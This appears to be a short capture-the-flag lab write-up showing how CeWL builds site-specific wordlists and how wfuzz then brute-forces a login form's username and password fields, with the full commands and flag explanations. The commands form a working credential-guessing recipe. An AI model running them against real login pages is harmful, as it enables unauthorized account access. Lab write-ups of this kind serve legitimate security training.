Task 10, Day 04, Brute-forcing Baby, it’s CeWLd outside

CeWL is a custom wordlist generator that spiders websites to create word lists based on the site’s content. Capability helps in brute-forcing and uncovering hidden directories using organization-specific terminology. Can also compile lists of email addresses or usernames from team member pages.

Create basic list:
cewl http://ADDRESS

Create and save list to file:
cewl http://ADDRESS -w FILENAME.txt

Since it’s CLI, it can be easily integrated into automated workflows and outputs can be directly inserted into other tools.

In this case, use wfuzz to make use of outputs.

wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://ADDRESS/login.php -d "username=FUZZ&password=FUZ2Z"
  • -c output with colors
  • -z file,usernames.txt loads the usernames list
  • -z file,passwords.txt uses the password list generated by CeWL
  • --hs "Please enter the correct credentials" hides responses containing the defined string
  • -u target URL
  • -d "username=FUZZ&password=FUZ2Z" provides POST data format to use and variables to replace

The Task

Generate username and password word lists from the website, then use wfuzz to find the credentials that work and grab the flag from the email.

Flag gotten.

Web Enumeration